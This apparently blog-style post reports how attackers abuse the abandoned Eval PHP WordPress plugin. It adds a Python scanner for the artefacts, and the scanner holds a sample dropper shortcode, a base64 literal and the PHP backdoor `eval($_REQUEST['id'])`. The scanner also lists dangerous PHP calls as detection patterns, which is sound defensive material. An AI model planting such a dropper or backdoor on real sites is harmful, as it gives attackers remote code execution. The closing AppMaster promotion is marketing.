Researchers at Sucuri, the GoDaddy-owned web security company, have found that Eval PHP, a legitimate but long-abandoned WordPress plugin, is being abused to compromise websites. Eval PHP was built to let site owners embed PHP code in posts and pages, and its last update was roughly a decade ago. It saw almost no downloads for years, then a sudden surge in the past month: more than 100,000 downloads, peaking at around 7,000 a day.
Sucuri's write-up describes how the attackers use Eval PHP. Malicious PHP placed inside the plugin's shortcode calls file_put_contents to write a script into the site's document root; that script is a remote code execution backdoor. The backdoor reads the PHP code it executes from $_REQUEST['id'], and because $_REQUEST merges $_GET, $_POST and $_COOKIE, the attacker can deliver the payload in a cookie rather than in a visible URL parameter. Sucuri points out that this makes the requests harder to spot: a default web server access log records the request line, including any GET query string, but not cookies or POST bodies, so a payload carried in a cookie leaves only a plain request to an unremarkable PHP file. The backdoor is equally dangerous whichever channel carries the code.
Sucuri also found that the attackers place the malicious code in draft posts rather than published ones, so it is never shown to visitors and is harder to uncover than content on a live page. WordPress had not responded to TechRadar Pro's questions about its policy on abandoned plugins at the time of writing. In the meantime, Sucuri advises WordPress users to harden the wp-admin panel and monitor activity closely, and offers a four-step plan to improve security:
- Ensure your website remains updated and patched according to the latest security releases
- Implement two-factor authentication (2FA) or a similar access restriction measure for your admin panel
- Maintain regular website backups to safeguard against unforeseen incidents
- Utilize a web application firewall to protect against malicious bots and virtually patch known vulnerabilities
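To make the monitoring advice concrete, here is an added example (my own code, not from the article, Sucuri or the plugin) that hunts for the two artefacts described above on a WordPress install: the [evalphp] shortcode injected into posts (drafts included) and the eval-from-request backdoor file dropped into the document root. It also reads a few access-log lines to show why a cookie-borne payload is invisible there and what is left to look for. All posts, file contents, log lines, IP addresses and the file name a1b2c3.php are constructed for the example.

```python
"""Added example (not from the article or from Sucuri): hunt for Eval PHP abuse
artefacts. SAMPLE_* data below is constructed; a1b2c3.php and the IPs are invented."""
import base64
import re
from pathlib import Path

SHORTCODE_RE = re.compile(r"\[evalphp\](.*?)\[/evalphp\]", re.IGNORECASE | re.DOTALL)
# Calls that have no business inside post content.
DANGEROUS_CALLS = ("file_put_contents", "eval(", "base64_decode", "system(",
                   "exec(", "passthru(", "shell_exec(")
# eval() fed from a request superglobal. $_REQUEST merges GET, POST and COOKIE,
# so the executed code may arrive in a cookie and never reach the access log.
BACKDOOR_RE = re.compile(r"eval\s*\(.*?\$_(REQUEST|GET|POST|COOKIE)\s*\[", re.DOTALL)
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def scan_posts(posts):
    """posts: dicts with ID, post_status, post_content, as exported from wp_posts.
    Drafts are scanned too; the attackers hid the code in unpublished posts."""
    findings = []
    for post in posts:
        for m in SHORTCODE_RE.finditer(post["post_content"]):
            body = m.group(1)
            calls = [c for c in DANGEROUS_CALLS if c in body]
            drops_backdoor = False
            # Decode inline base64 literals and test the decoded text as well,
            # since the dropped backdoor is usually passed in encoded form.
            for lit in B64_LITERAL_RE.findall(body):
                try:
                    decoded = base64.b64decode(lit, validate=True).decode("utf-8", "replace")
                except ValueError:  # binascii.Error is a ValueError subclass
                    continue
                if BACKDOOR_RE.search(decoded):
                    drops_backdoor = True
            findings.append({"post_id": post["ID"], "status": post["post_status"],
                             "calls": calls, "drops_backdoor": drops_backdoor})
    return findings


def find_backdoor_files(files):
    """files: {name: content} for PHP files directly under the document root."""
    return sorted(name for name, text in files.items()
                  if name.endswith(".php") and BACKDOOR_RE.search(text))


def scan_docroot(root):
    """Disk wrapper around find_backdoor_files: top-level *.php only, which is
    where the shortcode payload writes its file."""
    return find_backdoor_files({p.name: p.read_text(errors="replace")
                                for p in Path(root).glob("*.php")})


# PHP files WordPress itself ships in the site root.
KNOWN_ROOT_PHP = {"index.php", "wp-login.php", "wp-cron.php", "xmlrpc.php",
                  "wp-comments-post.php", "wp-signup.php", "wp-activate.php",
                  "wp-trackback.php", "wp-links-opml.php", "wp-mail.php",
                  "wp-load.php", "wp-blog-header.php", "wp-settings.php"}
# Apache/nginx combined log format: ip ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) ([^ "]+) HTTP/[\d.]+" (\d{3})')


def unexpected_php_requests(log_lines):
    """Requests for top-level PHP files WordPress does not ship. The log never
    shows a cookie or POST body, so the odd target path is the only signal."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]
        name = path.lstrip("/")
        if "/" not in name and name.endswith(".php") and name not in KNOWN_ROOT_PHP:
            out.append((ip, method, path, int(status)))
    return out


# Constructed samples, not real attack data.
SAMPLE_POSTS = [
    {"ID": 12, "post_status": "publish", "post_content": "<p>Hello world</p>"},
    {"ID": 47, "post_status": "draft", "post_content":
        "[evalphp] file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/a1b2c3.php', "
        "base64_decode('PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2lkJ10pOw==')); [/evalphp]"},
]
SAMPLE_DOCROOT = {
    "index.php": "<?php define('WP_USE_THEMES', true); require __DIR__ . '/wp-blog-header.php';",
    "a1b2c3.php": "<?php eval($_REQUEST['id']);",
}
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Apr/2023:10:01:02 +0000] "GET /wp-login.php HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    # This request carried the PHP to run in an "id" cookie; none of it is logged.
    '203.0.113.5 - - [20/Apr/2023:10:01:40 +0000] "GET /a1b2c3.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Apr/2023:10:02:11 +0000] "GET /index.php?p=12 HTTP/1.1" 200 8891 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan_posts(SAMPLE_POSTS))
    print(find_backdoor_files(SAMPLE_DOCROOT))
    print(unexpected_php_requests(SAMPLE_LOG))
```

On a real site, feed scan_posts the rows of wp_posts (for example via `wp db query` or a direct SELECT of ID, post_status, post_content) and point scan_docroot at the web root; the shortcode regex is the same one a WAF rule or a database grep would use, and the decoded-literal check catches the common case where the dropped file is passed as a base64 string rather than plain text. Treat any hit on a draft as seriously as one on a published post.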
With the rising adoption of no-code and low-code platforms, developers and business leaders can build web and mobile applications without depending on unmaintained plugins. One such solution is the AppMaster platform, an accessible and scalable no-code tool for creating backend, web, and mobile applications. AppMaster streamlines app development, avoids technical debt, and offers up-to-date tooling for businesses of all sizes.
For more detailed information on no-code and low-code app development, check out our comprehensive guide: Full Guide on No-Code, Low-Code App Development for 2022.